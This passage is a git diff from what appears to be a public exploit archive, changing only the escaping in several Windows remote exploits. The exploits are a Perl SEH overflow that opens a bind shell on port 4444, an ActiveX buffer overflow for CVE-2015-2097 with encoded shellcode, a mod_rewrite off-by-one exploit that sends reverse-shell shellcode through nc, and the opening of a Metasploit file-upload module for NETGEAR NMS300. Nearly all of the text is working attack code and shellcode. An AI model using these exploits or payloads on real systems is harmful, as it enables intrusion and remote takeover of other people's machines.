+"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
+"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
 
 
 
@@ -57,61 +57,61 @@ my $shellcode =
 
 
 foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\\.(.*)\\.(.*)\\.(.*))/);
+$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
 $seh = $1 if ($_=~/-o(.*)/);
 $happy = $1 if ($_=~/-o(.*)/);
 }
 
 switch ($seh) {
-case 1 { $seh=\"\\x43\\x8f\\x2d\\x7c\" } # Win2k SP4 English version jmp ebx in advapi32.dll
-case 2 { $seh=\"\\x43\\x8f\\x26\\x79\" } # Win2k SP4 Italian version jmp ebx in advapi32.dll
-case 3 { $seh=\"\\xc0\\x5f\\x3c\\x76\" } # WinXP Pro English SP1 version pop ecx pop ecx ret in comdlg32.dll
-case 4 { $seh=\"\\xfc\\x61\\x3c\\x76\" } # WinXP Pro English SP0 version pop ecx pop ecx ret in comdlg32.dll
+case 1 { $seh="\x43\x8f\x2d\x7c" } # Win2k SP4 English version jmp ebx in advapi32.dll
+case 2 { $seh="\x43\x8f\x26\x79" } # Win2k SP4 Italian version jmp ebx in advapi32.dll
+case 3 { $seh="\xc0\x5f\x3c\x76" } # WinXP Pro English SP1 version pop ecx pop ecx ret in comdlg32.dll
+case 4 { $seh="\xfc\x61\x3c\x76" } # WinXP Pro English SP0 version pop ecx pop ecx ret in comdlg32.dll
 }
 
 
 switch ($happy) {
-case 1 { $happy=\"\\x8d\\x83\\x34\\xff\\xff\\xff\\x50\\xc3\" } # Win2k SP4 English version
-case 2 { $happy=\"\\x8d\\x83\\x34\\xff\\xff\\xff\\x50\\xc3\" } # Win2k SP4 Italian version
-case 3 { $happy=\"\\x8b\\xc1\\x66\\x05\\x34\\x29\\x50\\xc3\" } # WinXP Pro English SP1 version
-case 4 { $happy=\"\\x8b\\xc1\\x66\\x05\\x34\\x29\\x50\\xc3\" } # WinXP Pro English SP0 version
+case 1 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 English version
+case 2 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 Italian version
+case 3 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP1 version
+case 4 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP0 version
 }
 
-my $request =\"1 LOGIN\".(\" \"x948).\"\\{255\\}\\n\";
+my $request ="1 LOGIN".(" "x948)."\{255\}\n";
 
 
 
-my $socket = IO::Socket::INET->new(proto=>\'tcp\', PeerAddr=>$host, PeerPort=>$port);
-$socket or die \"Cannot connect to host!\\n\";
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
+$socket or die "Cannot connect to host!\n";
 
 recv($socket, $reply, 1024, 0);
-print \"Response:\" . $reply;
+print "Response:" . $reply;
 
 send $socket, $request, 0;
-print \"[+] Sent 1st request\\n\";
+print "[+] Sent 1st request\n";
 recv($socket, $reply, 1024, 0);
-print \"Response:\" . $reply;
+print "Response:" . $reply;
 sleep(1);
 
 
 
-my $request =\"\\x41\" x 255;
+my $request ="\x41" x 255;
 
 send $socket, $request, 0;
-print \"[+] Sent 2nd request\\n\";
+print "[+] Sent 2nd request\n";
 sleep(1);
 
-my $request=(\"\\x45\" x7420).(\"\\x90\" x10).$happy.(\"\\x90\" x14).$shellcode.(\"\\x41\" x8).$nextseh.$seh.(\"\\x90\" x5).$jmp.(\"\\x90\" x533);
+my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
 
 send $socket, $request, 0;
-print \"[+] Sent final request\\n\";
+print "[+] Sent final request\n";
 sleep(1);
 
 close($socket);
 
-print \" + connect on port 4444 of $host ...\\n\";
+print " + connect on port 4444 of $host ...\n";
 sleep(3);
-system(\"telnet $host 4444\");
+system("telnet $host 4444");
 exit;
 
 # milw0rm.com [2007-03-24]
diff --git a/platforms/windows/remote/36602.html b/platforms/windows/remote/36602.html
index b3d55562e..33c79600d 100755
--- a/platforms/windows/remote/36602.html
+++ b/platforms/windows/remote/36602.html
@@ -9,9 +9,9 @@
 # Tested on: Windows XP SP3 using IE6/7/8
 # CVE : 2015-2097
 
-targetFile = \"C:\\Windows\\System32\\WESPSDK\\WESPConfig.dll\"
-prototype  = \"Function ChangePassword ( ByVal oldPwd As String ,  ByVal newPwd As String ) As Integer\"
-progid     = \"WESPCONFIGLib.UserItem\"
+targetFile = "C:\Windows\System32\WESPSDK\WESPConfig.dll"
+prototype  = "Function ChangePassword ( ByVal oldPwd As String ,  ByVal newPwd As String ) As Integer"
+progid     = "WESPCONFIGLib.UserItem"
 Tested on IE6/7/8
 Author: Praveen Darshanam
 http://darshanams.blogspot.com/
@@ -19,66 +19,66 @@ http://blog.disects.com/
 P.S. Do not remove back slashes in shellcode and other variables
 -->
 
-<object classid=\'clsid:9B61891E-D876-476E-B1E8-AA662F332004\' id=\'target\'>
+<object classid='clsid:9B61891E-D876-476E-B1E8-AA662F332004' id='target'>
 </object>
 <script>
 
-var arg1 = \"\";
-var arg2 = \"PraveenD\";
+var arg1 = "";
+var arg2 = "PraveenD";
 
-var nops = \"\";
-var shellcode = \"\";
-var buff2 = \"\";
+var nops = "";
+var shellcode = "";
+var buff2 = "";
 
 for (i=0; i<248; i++)
 {
-	arg1 += \"B\";
+	arg1 += "B";
 }
-var nseh = \"\\xeb\\x10PD\";
+var nseh = "\xeb\x10PD";
 //WESPConfig.dll(0x10022f35 = pop pop pop ret)
-var seh = \"\\x3d\\x2f\\x02\\x10\";
+var seh = "\x3d\x2f\x02\x10";
 for (i=0;i<80; i++)
 {
-	nops += \"\\x90\";
+	nops += "\x90";
 }
-shellcode = \"\\x54\\x5d\\xda\\xc9\\xd9\\x75\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\" +
-\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\" +
-\"\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\" +
-\"\\x30\\x41\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\" +
-\"\\x32\\x42\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\" +
-\"\\x49\\x4b\\x4c\\x5a\\x48\\x4b\\x32\\x45\\x50\\x55\\x50\\x43\\x30\" +
-\"\\x53\\x50\\x4b\\x39\\x4d\\x35\\x30\\x31\\x4f\\x30\\x52\\x44\\x4c\" +
-\"\\x4b\\x56\\x30\\x46\\x50\\x4c\\x4b\\x31\\x42\\x34\\x4c\\x4c\\x4b\" +
-\"\\x31\\x42\\x44\\x54\\x4c\\x4b\\x32\\x52\\x47\\x58\\x54\\x4f\\x38\" +
-\"\\x37\\x50\\x4a\\x37\\x56\\x46\\x51\\x4b\\x4f\\x4e\\x4c\\x57\\x4c\" +
-\"\\x35\\x31\\x33\\x4c\\x33\\x32\\x46\\x4c\\x37\\x50\\x49\\x51\\x48\" +
-\"\\x4f\\x34\\x4d\\x45\\x51\\x4f\\x37\\x4d\\x32\\x4a\\x52\\x36\\x32\" +
-\"\\x46\\x37\\x4c\\x4b\\x36\\x32\\x32\\x30\\x4c\\x4b\\x30\\x4a\\x37\" +
-\"\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x54\\x38\\x5a\\x43\\x51\\x58\" +
-\"\\x33\\x31\\x4e\\x31\\x30\\x51\\x4c\\x4b\\x36\\x39\\x47\\x50\\x53\" +
-\"\\x31\\x48\\x53\\x4c\\x4b\\x30\\x49\\x35\\x48\\x5a\\x43\\x36\\x5a\" +
-\"\\x57\\x39\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x33\\x31\\x49\\x46\\x56\" +
-\"\\x51\\x4b\\x4f\\x4e\\x4c\\x49\\x51\\x38\\x4f\\x54\\x4d\\x35\\x51\" +
-\"\\x58\\x47\\x37\\x48\\x4d\\x30\\x34\\x35\\x4a\\x56\\x43\\x33\\x43\" +
-\"\\x4d\\x5a\\x58\\x37\\x4b\\x43\\x4d\\x46\\x44\\x43\\x45\\x4d\\x34\" +
-\"\\x56\\x38\\x4c\\x4b\\x56\\x38\\x31\\x34\\x43\\x31\\x4e\\x33\\x42\" +
-\"\\x46\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x36\\x38\\x45\\x4c\" +
-\"\\x45\\x51\\x4e\\x33\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x33\\x31\\x48\" +
-\"\\x50\\x4c\\x49\\x57\\x34\\x36\\x44\\x51\\x34\\x51\\x4b\\x51\\x4b\" +
-\"\\x33\\x51\\x30\\x59\\x50\\x5a\\x36\\x31\\x4b\\x4f\\x4b\\x50\\x31\" +
-\"\\x4f\\x51\\x4f\\x51\\x4a\\x4c\\x4b\\x42\\x32\\x5a\\x4b\\x4c\\x4d\" +
-\"\\x31\\x4d\\x53\\x5a\\x35\\x51\\x4c\\x4d\\x4c\\x45\\x58\\x32\\x43\" +
-\"\\x30\\x53\\x30\\x55\\x50\\x56\\x30\\x42\\x48\\x50\\x31\\x4c\\x4b\" +
-\"\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x59\\x45\\x4f\\x4b\\x5a\\x50\\x48\" +
-\"\\x35\\x4f\\x52\\x30\\x56\\x53\\x58\\x4e\\x46\\x5a\\x35\\x4f\\x4d\" +
-\"\\x4d\\x4d\\x4b\\x4f\\x38\\x55\\x47\\x4c\\x53\\x36\\x33\\x4c\\x45\" +
-\"\\x5a\\x4b\\x30\\x4b\\x4b\\x4b\\x50\\x43\\x45\\x43\\x35\\x4f\\x4b\" +
-\"\\x47\\x37\\x32\\x33\\x53\\x42\\x42\\x4f\\x42\\x4a\\x55\\x50\\x46\" +
-\"\\x33\\x4b\\x4f\\x49\\x45\\x43\\x53\\x53\\x51\\x52\\x4c\\x52\\x43\" +
-\"\\x36\\x4e\\x55\\x35\\x44\\x38\\x33\\x55\\x33\\x30\\x41\\x41\";
+shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
+"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
+"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
+"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
+"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
+"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
+"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
+"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
+"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
+"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
+"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
+"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
+"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
+"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
+"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
+"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
+"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
+"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
+"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
+"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
+"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
+"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
+"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
+"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
+"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
+"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
+"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
+"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
+"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
+"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
+"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
+"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
+"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
+"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
 for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++)
 {
-	buff2 += \"A\";
+	buff2 += "A";
 }
 
 fbuff = arg1 + nseh + seh + nops + shellcode + buff2;
diff --git a/platforms/windows/remote/3680.sh b/platforms/windows/remote/3680.sh
index e9321e963..d5dc25d54 100755
--- a/platforms/windows/remote/3680.sh
+++ b/platforms/windows/remote/3680.sh
@@ -17,7 +17,7 @@
 # Vulnerability discovered by Mark Dowd.
 # CVE-2006-3747
 # 
-# first POC by jack <jack\\x40gulcas\\x2Eorg>
+# first POC by jack <jack\x40gulcas\x2Eorg>
 # 2006-08-20
 # http://www.milw0rm.com/exploits/2237
 #
@@ -40,7 +40,7 @@
 # [httpd.conf]:
 # RewriteEngine on
 # RewriteRule 1/(.*) $1
-# RewriteLog \"logs/rewrite.log\"
+# RewriteLog "logs/rewrite.log"
 # RewriteLogLevel 3
 # 
 # 
@@ -54,7 +54,7 @@
 # Microsoft Windows [¡ã?¡À? 5.2.3790]
 # (C) ¡ã?¨¨¡§?¨´¨®D 1985-2003 Microsoft Corp.
 # 
-# D:\\Apache\\Apache2>exit
+# D:\Apache\Apache2>exit
 # exit
 #  sent 5, rcvd 100
 # 
@@ -66,67 +66,67 @@
 #
 
 
-echo -e \"mod_rewrite apache off-by-one overflow\"
+echo -e "mod_rewrite apache off-by-one overflow"
 
 
 if [ $# -ne 1 ] ; then
-  echo \"Usage: $0 webserver\"
+  echo "Usage: $0 webserver"
   exit
 fi
 
 host=$1
 
-#use ldap:// to trigger the vuln, \"Ph4nt0m\" is any arbitrary string
-echo -ne \"GET /1/ldap://ph4nt0m/`perl -e \'print \"Ph4nt0m\"x5\'`\\  
+#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
+echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\  
 # %3f to trigger the vuln
-%3fA%3fA%3f\\    
-#string \"CCCC..\" is any arbitrary string, use %3f to trigger the vuln
+%3fA%3fA%3f\    
+#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
 #%90 is the machine code we will jmp to(NOP),run shellcode from here
-`perl -e \'print \"C\"x10\'`%3fC%3f%90\\    
+`perl -e 'print "C"x10'`%3fC%3f%90\    
 # shellcode,reverse shell to 192.168.0.1 ,port 1154  alpha2 encoded
-`perl -e \'print \"\\    
-\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\
-\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x63\\
-\\x58\\x30\\x42\\x30\\x50\\x42\\x6b\\x42\\x41\\x73\\x42\\x32\\x42\\x41\\x41\\x32\\
-\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x79\\x6c\\x51\\
-\\x7a\\x6a\\x4b\\x50\\x4d\\x4d\\x38\\x6b\\x49\\x79\\x6f\\x49\\x6f\\x6b\\x4f\\x65\\
-\\x30\\x4c\\x4b\\x72\\x4c\\x45\\x74\\x51\\x34\\x4e\\x6b\\x71\\x55\\x77\\x4c\\x6c\\
-\\x4b\\x33\\x4c\\x64\\x45\\x33\\x48\\x64\\x41\\x5a\\x4f\\x4c\\x4b\\x72\\x6f\\x36\\
-\\x78\\x4c\\x4b\\x73\\x6f\\x45\\x70\\x66\\x61\\x4a\\x4b\\x53\\x79\\x4e\\x6b\\x44\\
-\\x74\\x4e\\x6b\\x73\\x31\\x38\\x6e\\x55\\x61\\x79\\x50\\x6c\\x59\\x6c\\x6c\\x4b\\
-\\x34\\x6f\\x30\\x74\\x34\\x34\\x47\\x59\\x51\\x5a\\x6a\\x76\\x6d\\x76\\x61\\x6f\\
-\\x32\\x5a\\x4b\\x79\\x64\\x55\\x6b\\x33\\x64\\x51\\x34\\x41\\x38\\x30\\x75\\x4b\\
-\\x55\\x6e\\x6b\\x33\\x6f\\x44\\x64\\x46\\x61\\x7a\\x4b\\x32\\x46\\x6e\\x6b\\x34\\
-\\x4c\\x42\\x6b\\x6e\\x6b\\x73\\x6f\\x77\\x6c\\x54\\x41\\x58\\x6b\\x43\\x33\\x74\\
-\\x6c\\x6c\\x4b\\x4d\\x59\\x50\\x6c\\x74\\x64\\x75\\x4c\\x52\\x41\\x6f\\x33\\x50\\
-\\x31\\x6b\\x6b\\x72\\x44\\x4c\\x4b\\x50\\x43\\x66\\x50\\x6c\\x4b\\x33\\x70\\x64\\
-\\x4c\\x6c\\x4b\\x74\\x30\\x65\\x4c\\x4e\\x4d\\x4e\\x6b\\x53\\x70\\x47\\x78\\x33\\
-\\x6e\\x51\\x78\\x4c\\x4e\\x52\\x6e\\x56\\x6e\\x58\\x6c\\x50\\x50\\x59\\x6f\\x79\\
-\\x46\\x70\\x66\\x62\\x73\\x75\\x36\\x75\\x38\\x66\\x53\\x64\\x72\\x42\\x48\\x53\\
-\\x47\\x32\\x53\\x50\\x32\\x71\\x4f\\x71\\x44\\x49\\x6f\\x48\\x50\\x52\\x48\\x5a\\
-\\x6b\\x48\\x6d\\x6b\\x4c\\x65\\x6b\\x70\\x50\\x4b\\x4f\\x68\\x56\\x61\\x4f\\x4e\\
-\\x69\\x4a\\x45\\x30\\x66\\x6e\\x61\\x78\\x6d\\x67\\x78\\x73\\x32\\x42\\x75\\x52\\
-\\x4a\\x75\\x52\\x6b\\x4f\\x7a\\x70\\x61\\x78\\x6b\\x69\\x55\\x59\\x6c\\x35\\x6e\\
-\\x4d\\x51\\x47\\x4b\\x4f\\x4e\\x36\\x70\\x53\\x50\\x53\\x56\\x33\\x76\\x33\\x43\\
-\\x73\\x32\\x73\\x31\\x53\\x52\\x73\\x6b\\x4f\\x4a\\x70\\x70\\x68\\x6f\\x30\\x6d\\
-\\x78\\x35\\x50\\x46\\x61\\x30\\x66\\x30\\x68\\x76\\x64\\x6c\\x42\\x33\\x56\\x70\\
-\\x53\\x4e\\x69\\x78\\x61\\x4c\\x55\\x75\\x38\\x4a\\x4c\\x58\\x79\\x4c\\x6a\\x73\\
-\\x50\\x53\\x67\\x6b\\x4f\\x6a\\x76\\x73\\x5a\\x72\\x30\\x73\\x61\\x53\\x65\\x4b\\
-\\x4f\\x6a\\x70\\x52\\x46\\x31\\x7a\\x52\\x44\\x73\\x56\\x50\\x68\\x51\\x73\\x50\\
-\\x6d\\x32\\x4a\\x62\\x70\\x51\\x49\\x47\\x59\\x6a\\x6c\\x6c\\x49\\x4b\\x57\\x42\\
-\\x4a\\x73\\x74\\x6d\\x59\\x6d\\x32\\x35\\x61\\x6f\\x30\\x48\\x73\\x4f\\x5a\\x6f\\
-\\x65\\x4c\\x49\\x39\\x6d\\x4b\\x4e\\x33\\x72\\x54\\x6d\\x6b\\x4e\\x33\\x72\\x34\\
-\\x6c\\x6c\\x4d\\x50\\x7a\\x57\\x48\\x4e\\x4b\\x4c\\x6b\\x6c\\x6b\\x71\\x78\\x32\\
-\\x52\\x6b\\x4e\\x6c\\x73\\x42\\x36\\x49\\x6f\\x73\\x45\\x65\\x78\\x6b\\x4f\\x6e\\
-\\x36\\x71\\x4b\\x42\\x77\\x43\\x62\\x53\\x61\\x76\\x31\\x70\\x51\\x30\\x6a\\x35\\
-\\x51\\x62\\x71\\x76\\x31\\x72\\x75\\x43\\x61\\x4b\\x4f\\x6e\\x30\\x73\\x58\\x4e\\
-\\x4d\\x7a\\x79\\x37\\x75\\x38\\x4e\\x31\\x43\\x4b\\x4f\\x4a\\x76\\x30\\x6a\\x39\\
-\\x6f\\x6b\\x4f\\x70\\x37\\x6b\\x4f\\x6e\\x30\\x45\\x38\\x39\\x77\\x54\\x39\\x79\\
-\\x56\\x71\\x69\\x79\\x6f\\x53\\x45\\x56\\x64\\x69\\x6f\\x69\\x46\\x6b\\x4f\\x62\\
-\\x57\\x6b\\x4c\\x4b\\x4f\\x6a\\x70\\x50\\x68\\x6a\\x50\\x6f\\x7a\\x37\\x74\\x43\\
-\\x6f\\x72\\x73\\x4b\\x4f\\x6a\\x76\\x79\\x6f\\x38\\x50\\x63\\
-\"\'`\\
-HTTP/1.0\\r\\n\\
-Host: $host\\r\\n\\r\\n\" | nc -vv $host 80
+`perl -e 'print "\    
+\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\
+\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63\
+\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x42\x41\x41\x32\
+\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x79\x6c\x51\
+\x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x6f\x6b\x4f\x65\
+\x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x55\x77\x4c\x6c\
+\x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x4b\x72\x6f\x36\
+\x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x79\x4e\x6b\x44\
+\x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x59\x6c\x6c\x4b\
+\x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x6d\x76\x61\x6f\
+\x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x38\x30\x75\x4b\
+\x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x46\x6e\x6b\x34\
+\x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x6b\x43\x33\x74\
+\x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x41\x6f\x33\x50\
+\x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x4b\x33\x70\x64\
+\x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x70\x47\x78\x33\
+\x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x50\x59\x6f\x79\
+\x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x72\x42\x48\x53\
+\x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x50\x52\x48\x5a\
+\x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x56\x61\x4f\x4e\
+\x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x32\x42\x75\x52\
+\x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x59\x6c\x35\x6e\
+\x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x33\x76\x33\x43\
+\x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x68\x6f\x30\x6d\
+\x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x42\x33\x56\x70\
+\x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x79\x4c\x6a\x73\
+\x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x61\x53\x65\x4b\
+\x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x68\x51\x73\x50\
+\x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x49\x4b\x57\x42\
+\x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x73\x4f\x5a\x6f\
+\x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x4e\x33\x72\x34\
+\x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x6b\x71\x78\x32\
+\x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x78\x6b\x4f\x6e\
+\x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x51\x30\x6a\x35\
+\x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x30\x73\x58\x4e\
+\x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x76\x30\x6a\x39\
+\x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x77\x54\x39\x79\
+\x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x46\x6b\x4f\x62\
+\x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x7a\x37\x74\x43\
+\x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\
+"'`\
+HTTP/1.0\r\n\
+Host: $host\r\n\r\n" | nc -vv $host 80
 
 # milw0rm.com [2007-04-07]
diff --git a/platforms/windows/remote/39515.rb b/platforms/windows/remote/39515.rb
index 431207803..a5c3c53e8 100755
--- a/platforms/windows/remote/39515.rb
+++ b/platforms/windows/remote/39515.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -13,9 +13,9 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      \'Name\'        => \'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload\',
-      \'Description\' => %q{
-        Netgear\'s ProSafe NMS300 is a network management utility that runs on Windows systems.
+      'Name'        => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
+      'Description' => %q{
+        Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
         The application has a file upload vulnerability that can be exploited by an
         unauthenticated remote attacker to execute code as the SYSTEM user.
         Two servlets are vulnerable, FileUploadController (located at
@@ -23,41 +23,41 @@ class Metasploit4 < Msf::Exploit::Remote
         This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
         1.1.0.13.
       },
-      \'Author\' =>
+      'Author' =>
         [
-          \'Pedro Ribeiro <pedrib[at]gmail.com>\' # Vulnerability discovery and updated MSF module
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
         ],
-      \'License\' => MSF_LICENSE,
-      \'References\' =>
+      'License' => MSF_LICENSE,
+      'References' =>
         [
-          [\'CVE\', \'2016-1525\'],
-          [\'US-CERT-VU\', \'777024\'],
-          [\'URL\', \'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt\'],
-          [\'URL\', \'http://seclists.org/fulldisclosure/2016/Feb/30\']
+          ['CVE', '2016-1525'],
+          ['US-CERT-VU', '777024'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
         ],
-      \'DefaultOptions\' => { \'WfsDelay\' => 5 },
-      \'Platform\' => \'win\',
-      \'Arch\' => ARCH_X86,
-      \'Privileged\' => true,
-      \'Targets\' =>
+      'DefaultOptions' => { 'WfsDelay' => 5 },
+      'Platform' => 'win',
+      'Arch' => ARCH_X86,
+      'Privileged' => true,
+      'Targets' =>
         [
-          [ \'NETGEAR ProSafe Network Management System 300 / Windows\', {} ]
+          [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
         ],
-      \'DefaultTarget\' => 0,
-      \'DisclosureDate\' => \'Feb 4 2016\'))
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Feb 4 2016'))
 
     register_options(
       [
         Opt::RPORT(8080),
-        OptString.new(\'TARGETURI\', [true,  \"Application path\", \'/\'])
+        OptString.new('TARGETURI', [true,  "Application path", '/'])
       ], self.class)
   end
 
 
   def check
     res = send_request_cgi({
-      \'uri\'    => normalize_uri(datastore[\'TARGETURI\'], \'fileUpload.do\'),
-      \'method\' => \'GET\'
